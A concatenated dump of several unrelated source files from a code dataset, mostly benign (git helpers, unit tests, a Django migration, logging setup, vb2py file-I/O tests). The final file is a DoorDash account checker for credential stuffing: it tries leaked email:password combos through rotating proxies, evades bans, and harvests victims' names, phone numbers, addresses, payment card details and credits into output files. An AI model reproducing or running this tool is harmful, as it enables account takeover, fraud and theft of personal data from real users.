] | null | null | null | expon/utils/git.py | hi-zhenyu/expon | 17ad421cd4c4085d3cad090b7c3383e4957075c4 | [
"MIT"
] | null | null | null | expon/utils/git.py | hi-zhenyu/expon | 17ad421cd4c4085d3cad090b7c3383e4957075c4 | [
"MIT"
] | null | null | null |
import subprocess
def check_working_tree():
try:
subprocess.check_output(['git', 'diff', '--exit-code'])
except subprocess.CalledProcessError as e:
print('called process error')
out_bytes = e.output # Output generated before error
code = e.returncode # Return code
raise Exception('Your working tree is not empty, please commit all changes.')
else:
return True
def get_git_revision_short_hash():
try:
commit_id = subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).decode('ascii').strip()
except subprocess.CalledProcessError:
raise Exception('Somthing is wrong with your git workspace!')
else:
return commit_id | 33.272727 | 108 | 0.657104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.31694 |
d38adfd3b61c63659bb5353ed611e4308365e199 | 1,526 | py | Python | tests/dictionary/test_jmdict.py | DennisMerkus/omniglot | 687a681f4fa6721ea4655339d5c9f215161725b2 | [
"MIT"
] | null | null | null | tests/dictionary/test_jmdict.py | DennisMerkus/omniglot | 687a681f4fa6721ea4655339d5c9f215161725b2 | [
"MIT"
] | null | null | null | tests/dictionary/test_jmdict.py | DennisMerkus/omniglot | 687a681f4fa6721ea4655339d5c9f215161725b2 | [
"MIT"
] | null | null | null | import unittest
import pytest
from omniglot.jpn.jmdict.convert import create_JMDict_database_entries
from omniglot.jpn.jmdict.extract import convert_to_JSON
from omnilingual import PartOfSpeech
from .test_jmdict_entries import entry_America, entry_batsuichi
class TestJMDict(unittest.TestCase):
@pytest.mark.asyncio
async def test_converts_America_entry_correctly(self):
lexemes = await create_JMDict_database_entries(
await convert_to_JSON(entry_America)
)
self.assertEqual(len(lexemes), 1)
lexeme = lexemes[0]
self.assertSetEqual(set(lexeme.orthography.all), set(["亜米利加", "亜墨利加", "アメリカ"]))
self.assertIn("アメリカ", lexeme.orthography.kana)
self.assertEqual(lexeme.pos, PartOfSpeech.Noun)
self.assertIn("?UsuallyKana", lexeme.tags)
@pytest.mark.asyncio
async def test_converts_restricted_kana_correctly(self):
lexemes = await create_JMDict_database_entries(
await convert_to_JSON(entry_batsuichi)
)
self.assertEqual(len(lexemes), 1)
lexeme = lexemes[0]
self.assertSetEqual(
set(lexeme.orthography.all),
set(["罰一", "ばつ一", "バツ1", "ばついち", "バツいち", "バツイチ"]),
)
self.assertSetEqual(set(lexeme.orthography.kana), set(["ばついち", "バツいち", "バツイチ"]))
self.assertSetEqual(set(lexeme.orthography.kanji), set(["罰一", "ばつ一", "バツ1"]))
self.assertEqual(lexeme.pos, PartOfSpeech.Noun)
if __name__ == "__main__":
unittest.main()
| 28.792453 | 88 | 0.679554 | 1,325 | 0.808913 | 0 | 0 | 1,278 | 0.78022 | 1,228 | 0.749695 | 224 | 0.136752 |
d38c29f52b40e951d49b1e350345234b2a6592db | 572 | py | Python | algorithms/TrackR-CNN/mots_tools/mots_common/images_to_txt.py | Diego-Barbulo/TrackR-CNN | 12eeaca0bd1903ee28822bd2341456404b6e0af4 | [
"MIT"
] | 1 | 2022-03-25T08:57:52.000Z | 2022-03-25T08:57:52.000Z | algorithms/TrackR-CNN/mots_tools/mots_common/images_to_txt.py | Diego-Barbulo/TrackR-CNN | 12eeaca0bd1903ee28822bd2341456404b6e0af4 | [
"MIT"
] | null | null | null | algorithms/TrackR-CNN/mots_tools/mots_common/images_to_txt.py | Diego-Barbulo/TrackR-CNN | 12eeaca0bd1903ee28822bd2341456404b6e0af4 | [
"MIT"
] | 1 | 2022-03-25T08:58:19.000Z | 2022-03-25T08:58:19.000Z | import sys
from mots_common.io import load_sequences, load_seqmap, write_sequences
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python images_to_txt.py gt_img_folder gt_txt_output_folder seqmap")
sys.exit(1)
gt_img_folder = sys.argv[1]
gt_txt_output_folder = sys.argv[2]
seqmap_filename = sys.argv[3]
seqmap, _ = load_seqmap(seqmap_filename)
print("Loading ground truth images...")
gt = load_sequences(gt_img_folder, seqmap)
print("Writing ground truth txts...")
write_sequences(gt, gt_txt_output_folder)
| 30.105263 | 86 | 0.723776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 146 | 0.255245 |
d38e40999aab7b5c93fbc4223d42505d8ef713d4 | 707 | py | Python | assets/migrations/0014_auto_20161105_1739.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | null | null | null | assets/migrations/0014_auto_20161105_1739.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | 11 | 2020-03-24T15:29:46.000Z | 2022-03-11T23:14:48.000Z | assets/migrations/0014_auto_20161105_1739.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assets', '0013_metadocumentasset_metadocumentsecureasset'),
]
operations = [
migrations.AlterField(
model_name='metadocumentasset',
name='asset',
field=models.OneToOneField(to='assets.Asset', null=True, related_name='meta_document'),
),
migrations.AlterField(
model_name='metadocumentsecureasset',
name='asset',
field=models.OneToOneField(to='assets.SecureAsset', null=True, related_name='meta_document'),
),
]
| 28.28 | 105 | 0.637907 | 598 | 0.845827 | 0 | 0 | 0 | 0 | 0 | 0 | 201 | 0.2843 |
d38e59555b55370c405b1d51851796ba7dbc18c5 | 695 | py | Python | pythontuts/nestedlists.py | antfarmar/hackerrank | 87aa6ec8abd35746f209efdaa29b1799fd03baaa | [
"Unlicense"
] | 1 | 2021-09-09T02:02:53.000Z | 2021-09-09T02:02:53.000Z | pythontuts/nestedlists.py | antfarmar/hackerrank | 87aa6ec8abd35746f209efdaa29b1799fd03baaa | [
"Unlicense"
] | null | null | null | pythontuts/nestedlists.py | antfarmar/hackerrank | 87aa6ec8abd35746f209efdaa29b1799fd03baaa | [
"Unlicense"
] | null | null | null | #import sys
#file = sys.stdin
file = open( r".\data\nestedlists.txt" )
data = file.read().strip().split()[1:]
records = [ [data[i], float(data[i+1])] for i in range(0, len(data), 2) ]
print(records)
low = min([r[1] for r in records])
dif = min([r[1] - low for r in records if r[1] != low])
print(dif)
names = [ r[0] for r in records if r[1]-dif == low]
[print(name) for name in sorted(names)]
#from decimal import Decimal
#from itertools import groupby, islice
#from operator import itemgetter
#a = []
#for i in range(int(input())):
# x, y = (input(), Decimal(input()))
# a.append((y, x))
#a.sort()
#for k, v in islice(groupby(a, key=itemgetter(0)), 1, 2):
# for x in v:
# print(x[1])
| 25.740741 | 73 | 0.623022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 340 | 0.489209 |
d38f0abfb6dad1b66224355d43de5f31e2448b16 | 1,856 | py | Python | src/koala/logging.py | hugovk/koala | a493b8159d559c39ef39d755d4e50a7bcc9bd4e5 | [
"BSD-3-Clause"
] | 4 | 2020-02-14T03:51:47.000Z | 2022-02-01T03:53:50.000Z | src/koala/logging.py | hugovk/koala | a493b8159d559c39ef39d755d4e50a7bcc9bd4e5 | [
"BSD-3-Clause"
] | 278 | 2020-02-13T00:34:20.000Z | 2022-03-31T11:56:09.000Z | src/koala/logging.py | hugovk/koala | a493b8159d559c39ef39d755d4e50a7bcc9bd4e5 | [
"BSD-3-Clause"
] | 12 | 2020-02-12T23:56:04.000Z | 2022-01-20T01:39:35.000Z | # -*- coding: utf-8 -*-
"""
Logging configuration functions
"""
from logbook import NullHandler, FileHandler, NestedSetup
from logbook.more import ColorizedStderrHandler
from logbook.queues import ThreadedWrapperHandler
def logging_options(parser):
"""Add cli options for logging to parser"""
LOG_LEVELS = ("critical", "error", "warning", "notice", "info", "debug")
parser.add_argument("--log-file")
parser.add_argument(
"--log-file-level", choices=LOG_LEVELS, default="debug"
)
stderr_parser = parser.add_mutually_exclusive_group()
stderr_parser.add_argument(
"--stderr-level", choices=LOG_LEVELS, default="notice"
)
stderr_parser.add_argument(
"--quiet", "-q", default=False, action="store_true",
)
stderr_parser.add_argument(
"--verbose", "-v", default=False, action="store_true",
)
def log_handler(args, thread_wrapping=True):
"""
Return log handler with given config
"""
if not isinstance(args, dict):
args = vars(args)
if args.get("quiet"):
stderr_handler = ColorizedStderrHandler(level="ERROR")
elif args.get("verbose"):
stderr_handler = ColorizedStderrHandler(level="DEBUG")
else:
stderr_handler = ColorizedStderrHandler(
level=args.get("stderr_level", "NOTICE").upper(), bubble=True
)
if args.get("log_file"):
file_handler = FileHandler(
args.get("log_file"),
level=args.get("log_file_level", "DEBUG").upper(), bubble=True
)
else:
file_handler = NullHandler()
if thread_wrapping:
file_handler = ThreadedWrapperHandler(file_handler)
stderr_handler = ThreadedWrapperHandler(stderr_handler)
return NestedSetup([
NullHandler(), # catch everything else
file_handler, stderr_handler
])
| 31.457627 | 76 | 0.657328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 435 | 0.234375 |
d3903637fa8b57e3aab7d4a1d3f9885bab2aabda | 34 | py | Python | build/lib/abp/adaptives/dqn/__init__.py | LinearZoetrope/abp | 2459c1b4d77606c1d70715ce8378d738ba102f37 | [
"MIT"
] | null | null | null | build/lib/abp/adaptives/dqn/__init__.py | LinearZoetrope/abp | 2459c1b4d77606c1d70715ce8378d738ba102f37 | [
"MIT"
] | 1 | 2018-10-17T03:28:08.000Z | 2018-10-17T03:28:08.000Z | build/lib/abp/adaptives/dqn/__init__.py | Zaerei/abp | 2459c1b4d77606c1d70715ce8378d738ba102f37 | [
"MIT"
] | null | null | null | from .adaptive import DQNAdaptive
| 17 | 33 | 0.852941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d391cc09726af2cc48341fbff68008cd2eedea8a | 8,451 | py | Python | test/testfiles.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 2 | 2015-12-01T10:52:36.000Z | 2021-04-20T05:15:01.000Z | test/testfiles.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 4 | 2016-07-18T18:28:24.000Z | 2016-07-19T08:30:14.000Z | test/testfiles.py | mvz/vb2py | 6ea046f6fc202527a1b3fcd3ef5a67b969dea715 | [
"BSD-3-Clause"
] | 3 | 2015-07-15T21:08:19.000Z | 2021-02-25T09:39:12.000Z | from testframework import *
import os
import vb2py.utils
PATH = vb2py.utils.rootPath()
# << File tests >> (1 of 14)
# Open with Input
tests.append((r"""
Open "%s" For Input As #3
Input #3, a
Input #3, b
Input #3, c, d, e
Input #3, f, g
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"), {'a' : 'Can you hear me now?',
'b' : 'Can you still hear me now?',
'c' : 10, 'd' : 20, 'e' : 30,
'f' : 5, 'g' : "hello",
}))
# Open with Line Input
tests.append((r"""
Open "%s/test/testread.txt" For Input As #3
Line Input #3, a
Line Input #3, b
Line Input #3, c
Line Input #3, d
Close #3
""" % PATH, {'a' : 'Can you hear me now?',
'b' : 'Can you still hear me now?',
'c' : '10, 20, 30',
'd' : '5, "hello"',
}))
# Open and using Input() to get numbers of characters
tests.append((r"""
Open "%s/test/testread.txt" For Input As #3
a = Input(3, #3)
b = Input(1, #3)
c = Input(3, #3)
Close #3
""" % PATH, {'a' : 'Can',
'b' : ' ',
'c' : 'you',
}))
# Bug #810964 Input with indexed variable fails
tests.append((r"""
Open "%s/test/testread.txt" For Input As #3
Dim _a(3) As String
Input #3, _a(1), _a(2), _a(3)
Close #3
a = _a(1)
b = _a(2)
c = _a(3)
""" % PATH, {'a' : 'Can you hear me now?',
'b' : 'Can you still hear me now?',
'c' : 10,
}))
# Open with Random access
tests.append((r"""
Open "%s" For Random As #3 Len = 2
' !!!!Dont expect this to work!!!!
Input #3, a
Input #3, b
Input #3, c, d, e
Input #3, f, g
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"), {'a' : 'This wont work!!!!'}))
# << File tests >> (2 of 14)
# Open with print
tests.append((r"""
Open "%s/test/testwrite.txt" For Output As #3
Print #3, 10
Print #3, 20, 30
Print #3, 40, 50
Print #3, "hello"
Close #3
Open "%s/test/testwrite.txt" For Input As #3
Input #3, a, b, c, d, f
Line Input #3, e
""" % (PATH, PATH), {'a' : 10, 'b' : 20,
'c' : 30, 'd' : 40, 'e' : 'hello',
'f' : 50,
}))
# Open with print but no cr
tests.append((r"""
Open "%s/test/testwrite.txt" For Output As #3
Print #3, 10;
Print #3, 20, 30;
Print #3, 40, "hello", 50;
Close #3
Open "%s/test/testwrite.txt" For Input As #3
Line Input #3, a
""" % (PATH, PATH), {'a' : "1020\t3040\thello\t50"}
))
# Bare print with no channel number (Bug #805866 - used to fail during render)
tests.append(("Print 10", {}))
# << File tests >> (3 of 14)
# Open with Input
tests.append((r"""
Close
_a = FreeFile
Open "%s" For Input As FreeFile
Open "%s" For Output As FreeFile
_b = FreeFile
Close
_c = FreeFile
a = _a = _b
b = _a = _c
c = _b = _c
d = CStr(_a) & CStr(_b) & CStr(_c)
""" % (vb2py.utils.relativePath("test/testread.txt"),
vb2py.utils.relativePath("test/testwrite.txt")),
{'a':0, 'b':1, 'c':0, 'd': '131',
}))
# Using Reset instead of Close
tests.append((r"""
Reset
_a = FreeFile
Open "%s" For Input As FreeFile
Open "%s" For Output As FreeFile
_b = FreeFile
Reset
_c = FreeFile
a = _a = _b
b = _a = _c
c = _b = _c
d = CStr(_a) & CStr(_b) & CStr(_c)
""" % (vb2py.utils.relativePath("test/testread.txt"),
vb2py.utils.relativePath("test/testwrite.txt")),
{'a':0, 'b':1, 'c':0, 'd': '131',
}))
# Bug #810968 Close #1, #2 ' fails to parse
tests.append((r"""
Open "%s" For Input As #3
Open "%s" For Output As #4
Close #3, #4
Input #3, a
""" % (vb2py.utils.relativePath("test/testread.txt"),
vb2py.utils.relativePath("test/testwrite.txt")),
{'FAIL' : 'yes',
}))
# << File tests >> (4 of 14)
# Seek as a way of moving around in a file
tests.append((r"""
Open "%s" For Input As #3
Input #3, a
Seek #3, 1
Input #3, b
Seek #3, 5
Input #3, c
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 'Can you hear me now?',
'b' : 'Can you hear me now?',
'c' : 'you hear me now?',
}))
# Seek as a property of the file
tests.append((r"""
Open "%s" For Input As #3
a = Seek(3)
Input #3, _a
b = Seek(3)
Seek #3, 5
c = Seek(3)
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 1,
'b' : 23,
'c' : 5,
}))
# << File tests >> (5 of 14)
# Dir
tests.append((r"""
a = Dir("test/test*.txt")
b = Dir()
c = Dir()
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# Dir$
tests.append((r"""
a = Dir$("test/test*.txt")
b = Dir$()
c = Dir$()
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# Dir no parenthesis
tests.append((r"""
a = Dir("test/test*.txt")
b = Dir
c = Dir
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# Dir$ no parenthesis
tests.append((r"""
a = Dir$("test/test*.txt")
b = Dir$
c = Dir$
""",
{
'a' : 'testread.txt',
'b' : 'testwrite.txt',
'c' : '',
}))
# << File tests >> (6 of 14)
# Dir
tests.append((r"""
_a = FreeFile
Open "__f1.txt" For Output As #_a
_b = FreeFile
Open "__f2.txt" For Output As #_b
Close #_b
_c = FreeFile
Close #_a
_d = FreeFile
da = _b-_a
db = _c-_a
dd = _d-_a
""",
{
'da' : 1,
'db' : 1,
'dd' : 0,
}))
# << File tests >> (7 of 14)
# Dir
tests.append((r"""
ChDir "%s"
Open "_test1.txt" For Output As #3
Print #3, "in testdir"
Close #3
ChDir "%s"
Open "_test1.txt" For Output As #3
Print #3, "not in testdir"
Close #3
ChDir "%s"
Open "_test1.txt" For Input As #3
Input #3, a
Close #3
ChDir "%s"
Open "_test1.txt" For Input As #3
Input #3, b
Close #3
""" % (vb2py.utils.relativePath("test/testdir"),
vb2py.utils.relativePath("test"),
vb2py.utils.relativePath("test/testdir"),
vb2py.utils.relativePath("test")),
{
'a' : 'in testdir',
'b' : 'not in testdir',
}))
# << File tests >> (8 of 14)
# Dir
tests.append((r"""
Open "_test1.txt" For Output As #3
Print #3, "made file"
Close #3
Kill "_test1.txt"
a = Dir("_test1.txt")
""",
{
'a' : '',
}))
# << File tests >> (9 of 14)
try:
for name in os.listdir(vb2py.utils.relativePath("test/mytest2")):
os.remove(os.path.join(vb2py.utils.relativePath("test/mytest2"), name))
except OSError:
pass
try:
os.rmdir(vb2py.utils.relativePath("test/mytest2"))
except OSError, err:
pass
# Dir
tests.append((r"""
MkDir "%s"
Open "%s\test1.txt" For Output As #3
Print #3, "made file"
Close #3
a = 1
""" % (vb2py.utils.relativePath("test/mytest2"),
vb2py.utils.relativePath("test/mytest2")),
{
'a' : 1,
}))
# << File tests >> (10 of 14)
try:
for name in os.listdir(vb2py.utils.relativePath("test/mytestdir")):
os.remove(os.path.join(vb2py.utils.relativePath("test/mytestdir"), name))
except OSError:
pass
try:
os.rmdir(vb2py.utils.relativePath("test/mytestdir"))
except OSError:
pass
# Dir
tests.append((r"""
MkDir "%s"
RmDir "%s"
a = 0
""" % (vb2py.utils.relativePath("test/mytestdir"),
vb2py.utils.relativePath("test/mytestdir")),
{
'a' : os.path.isdir(vb2py.utils.relativePath("test/mytestdir")),
}))
# << File tests >> (11 of 14)
try:
os.remove(os.path.join(vb2py.utils.relativePath("test"), "knewname.txt"))
except OSError:
pass
# Dir
tests.append((r"""
_path = "%s"
Open _path & "\origname.txt" For Output As #3
Close #3
a = Dir(_path & "\origname.txt")
Name _path & "\origname.txt" As _path & "\knewname.txt"
b = Dir(_path & "\origname.txt")
c = Dir(_path & "\knewname.txt")
""" % (vb2py.utils.relativePath("test")),
{
'a' : "origname.txt",
'b' : "",
'c' : "knewname.txt",
}))
# << File tests >> (12 of 14)
try:
os.remove(os.path.join(vb2py.utils.relativePath("test"), "finalcopy.txt"))
except OSError:
pass
# Dir
tests.append((r"""
_path = "%s"
Open _path & "\origcopy.txt" For Output As #3
Print #3, "original"
Close #3
a = Dir(_path & "\origcopy.txt")
b = Dir(_path & "\finalcopy.txt")
FileCopy _path & "\origcopy.txt", _path & "\finalcopy.txt"
c = Dir(_path & "\origcopy.txt")
d = Dir(_path & "\finalcopy.txt")
""" % (vb2py.utils.relativePath("test")),
{
'a' : "origcopy.txt",
'b' : "",
'c' : "origcopy.txt",
'd' : "finalcopy.txt",
}))
# << File tests >> (13 of 14)
# Input as a function to get a certain number of characters
tests.append((r"""
Open "%s" For Input As #3
a = Input(3, #3)
b = Input(4, #3)
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 'Can',
'b' : ' you',
}))
# << File tests >> (14 of 14)
# Input as a function to get a certain number of characters
tests.append((r"""
Open "%s" For Input As #3
While Not EOF(#3)
Input #3, a
End While
Close #3
""" % vb2py.utils.relativePath("test/testread.txt"),
{
'a' : 'hello',
}))
# -- end -- << File tests >>
#< < Small File tests >>
import vb2py.vbparser
vb2py.vbparser.log.setLevel(0) # Don't print all logging stuff
TestClass = addTestsTo(BasicTest, tests)
if __name__ == "__main__":
main()
| 20.121429 | 83 | 0.595196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 5,750 | 0.680393 |
d3921bbf727327b6abcb686de351663bb6fe7b42 | 181 | py | Python | Reinforcement_Learning/gym-environments/setup.py | SpencerPao/ComputerVision | 807ce1a1bb651a7a2248f074ab3caab95ea56a96 | [
"MIT"
] | 1 | 2021-11-22T21:52:35.000Z | 2021-11-22T21:52:35.000Z | Reinforcement_Learning/gym-environments/setup.py | SpencerPao/ComputerVision | 807ce1a1bb651a7a2248f074ab3caab95ea56a96 | [
"MIT"
] | 2 | 2021-11-23T02:02:56.000Z | 2021-12-19T01:04:38.000Z | Reinforcement_Learning/gym-environments/setup.py | SpencerPao/ComputerVision | 807ce1a1bb651a7a2248f074ab3caab95ea56a96 | [
"MIT"
] | null | null | null | from setuptools import setup
setup(name='gym_dinorun',
version='0.1',
install_requires=['gym', 'selenium', 'numpy', 'pillow', 'pyvirtualdisplay', 'matplotlib']
)
| 25.857143 | 95 | 0.651934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 78 | 0.430939 |
d395a54f3004f10283773579ea5b4ac7ad799fb1 | 2,234 | py | Python | openstack_dashboard/test/api_tests/cinder_tests.py | dreamhost/horizon | 55569d540e6c1a6957d5127f9bae6a699ed60823 | [
"Apache-2.0"
] | 3 | 2017-02-13T15:11:01.000Z | 2021-07-28T08:28:09.000Z | openstack_dashboard/test/api_tests/cinder_tests.py | yongquanf/horizon | 9aad7fd6f66588fed7c27b720642e47a4a12854b | [
"Apache-2.0"
] | 10 | 2015-02-19T20:27:04.000Z | 2017-05-15T15:04:32.000Z | openstack_dashboard/test/api_tests/cinder_tests.py | yongquanf/horizon | 9aad7fd6f66588fed7c27b720642e47a4a12854b | [
"Apache-2.0"
] | 4 | 2015-05-05T08:17:28.000Z | 2020-02-05T10:47:06.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
class CinderApiTests(test.APITestCase):
def test_volume_list(self):
search_opts = {'all_tenants': 1}
volumes = self.volumes.list()
cinderclient = self.stub_cinderclient()
cinderclient.volumes = self.mox.CreateMockAnything()
cinderclient.volumes.list(search_opts=search_opts,).AndReturn(volumes)
self.mox.ReplayAll()
# No assertions are necessary. Verification is handled by mox.
api.cinder.volume_list(self.request, search_opts=search_opts)
def test_volume_snapshot_list(self):
volume_snapshots = self.volume_snapshots.list()
cinderclient = self.stub_cinderclient()
cinderclient.volume_snapshots = self.mox.CreateMockAnything()
cinderclient.volume_snapshots.list().AndReturn(volume_snapshots)
self.mox.ReplayAll()
api.cinder.volume_snapshot_list(self.request)
def test_volume_snapshot_list_no_volume_configured(self):
# remove volume from service catalog
catalog = self.service_catalog
for service in catalog:
if service["type"] == "volume":
self.service_catalog.remove(service)
volume_snapshots = self.volume_snapshots.list()
cinderclient = self.stub_cinderclient()
cinderclient.volume_snapshots = self.mox.CreateMockAnything()
cinderclient.volume_snapshots.list().AndReturn(volume_snapshots)
self.mox.ReplayAll()
api.cinder.volume_snapshot_list(self.request)
| 39.192982 | 78 | 0.715309 | 1,490 | 0.666965 | 0 | 0 | 0 | 0 | 0 | 0 | 760 | 0.340197 |
d3963f0cda7e231690d35ea142f4ffd430047c44 | 144 | py | Python | admin-portal/queues/apps.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | admin-portal/queues/apps.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | admin-portal/queues/apps.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | 1 | 2021-09-19T10:58:17.000Z | 2021-09-19T10:58:17.000Z | from django.apps import AppConfig
class QueuesConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "queues"
| 20.571429 | 56 | 0.756944 | 107 | 0.743056 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.270833 |
d396697591d214281a9fa0a4c6107036bc957349 | 964 | py | Python | tests/test_cron.py | acuros/noopy | aa128466068bfcdcd4be3aa16c1bdd48fd9e5a23 | [
"MIT"
] | 11 | 2016-01-16T06:00:39.000Z | 2016-05-24T02:25:58.000Z | tests/test_cron.py | acuros/noopy | aa128466068bfcdcd4be3aa16c1bdd48fd9e5a23 | [
"MIT"
] | 4 | 2016-01-23T07:00:47.000Z | 2016-05-09T02:49:26.000Z | tests/test_cron.py | acuros/noopy | aa128466068bfcdcd4be3aa16c1bdd48fd9e5a23 | [
"MIT"
] | null | null | null | import pytest
from noopy.cron.rule import RateEventRule, BaseEventRule, TimeEventRule
from noopy.decorators import cron
@pytest.fixture
def rate_5_mins_rule():
return RateEventRule('5MinsRateRule', value=5)
@pytest.fixture
def time_5pm_rule():
return TimeEventRule('5pmRule', '* 17 * * * *')
@pytest.fixture
def cronjob():
return lambda event, context: dict(foo='bar')
def test_rate_rule(rate_5_mins_rule):
assert len(BaseEventRule.rules) == 0
assert rate_5_mins_rule.expression == 'rate(5 minutes)'
def test_time_rule(time_5pm_rule):
assert len(BaseEventRule.rules) == 0
assert time_5pm_rule.expression == 'cron(* 17 * * * *)'
def test_cron_decorator(cronjob):
rule = RateEventRule("RateCron", 1, RateEventRule.UNIT_HOURS)
cron(rule)(cronjob)
assert len(BaseEventRule.rules) == 1
assert len(BaseEventRule.rules.values()[0].functions) == 1
assert BaseEventRule.rules.values()[0].functions[0] == cronjob
| 25.368421 | 71 | 0.724066 | 0 | 0 | 0 | 0 | 258 | 0.267635 | 0 | 0 | 90 | 0.093361 |
d3969c2344d1fd1927504d6b7d57dcf4c82c4a97 | 5,420 | py | Python | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 5 | 2021-02-24T23:37:52.000Z | 2021-08-18T06:39:30.000Z | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | null | null | null | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 1 | 2021-03-26T06:21:20.000Z | 2021-03-26T06:21:20.000Z | import requests
import random
import json
from multiprocessing import Pool # Multi-Threading
from multiprocessing import freeze_support # Windows Support
requests.packages.urllib3.disable_warnings()
accounts = [line.rstrip('\n') for line in open("combo.txt", 'r')]
proxies = [line.rstrip('\n') for line in open("proxies.txt", 'r')]
workingJson = []
headers = {
'Content-Type': 'application/json',
}
def generateSocks5ProxyUrl(ip, port, username=None, password=None):
if(username and password):
return {
'http': f"socks5://{username}:{password}@{ip}:{port}",
'https': f"socks5://{username}:{password}@{ip}:{port}"
}
else:
return {
'http': f"socks5://{ip}:{port}",
'https': f"socks5://{ip}:{port}"
}
def generateLoginPayload(email, password):
return {
"email": email,
"password": password
}
def createOutputString(email, password, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience):
response = f"{email}:{password} | "
if first_name and last_name:
response += f"Name: {first_name} {last_name} | "
if phone_number:
response += f"Phone Number: {phone_number} | "
if account_credits:
response += f"Account Credits: {account_credits} | "
if printable_address:
response += f"Default Address: {printable_address} | "
if default_card_type and default_card_exp_month and default_card_exp_year and default_card_last4:
response += f"Default Card: {default_card_type}*{default_card_last4} Expires {default_card_exp_month}/{default_card_exp_year} | "
if show_alcohol_experience:
response += F"Alcohol Allowed: {str(show_alcohol_experience)} |"
response = response[:-2] + "\n"
return response
def checkAccount(account):
global proxies
proxy = random.choice(proxies)
ip, port, username, password = proxy.split(':')
userEmail, userPassword = account.split(':')
proxyUrl = generateSocks5ProxyUrl(ip, port, username, password)
try:
response = requests.post('https://api.doordash.com/v2/auth/web_login/', proxies=proxyUrl, headers=headers, data=json.dumps(generateLoginPayload(userEmail, userPassword)))
if (response.status_code == 403 or response.status_code == 406 or 'Access Denied' in response.text):
print(f"[Cloudflare Banned Proxy] {proxy}")
elif ('Login banned due to violation of terms of service' in response.text):
print(f"[Banned Proxy] {proxy}")
proxies.remove(proxy)
elif ('id' in response.text):
# Convert response to JSON
userData = response.json()
# Inject the user's password into the response object
userData['password'] = userPassword
# User's Personal Info
first_name = userData['first_name'] or None
last_name = userData['last_name'] or None
phone_number = userData['phone_number'] or None
# Account Credits
account_credits = userData['account_credits'] or None
# Default Address Info
default_address = userData['default_address'] or None
if default_address:
printable_address = default_address['printable_address'] or None
else:
printable_address = None
# Default Card Info
default_card = userData['default_card'] or None
if default_card:
default_card_type = default_card['type'] or None
default_card_exp_month = default_card['exp_month'] or None
default_card_exp_year = default_card['exp_year'] or None
default_card_last4 = default_card['last4'] or None
else:
default_card_type = None
default_card_exp_month = None
default_card_exp_year = None
default_card_last4 = None
# Can recieve alcohol
show_alcohol_experience = userData['show_alcohol_experience'] or None
# Combine into one string
outputString = createOutputString(userEmail, userPassword, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience)
print(f"[Good Account] {outputString}")
try:
with open('out.txt', 'a') as f:
f.write(outputString)
f.close()
except:
print('[Write Fail] Failed to write account information to working file')
try:
workingJson.append(response.json())
with open('data.json', 'w') as outfile:
json.dump(workingJson, outfile)
outfile.close()
except:
print('[Write Fail] Failed to write account information to JSON')
except Exception as e:
print(f'[Checking Failed] {e}')
def main():
numThreads = input("How many threads would you like to use? ")
freeze_support()
pool = Pool(int(numThreads))
pool.map(checkAccount, accounts)
pool.close()
pool.join()
if __name__ == "__main__":
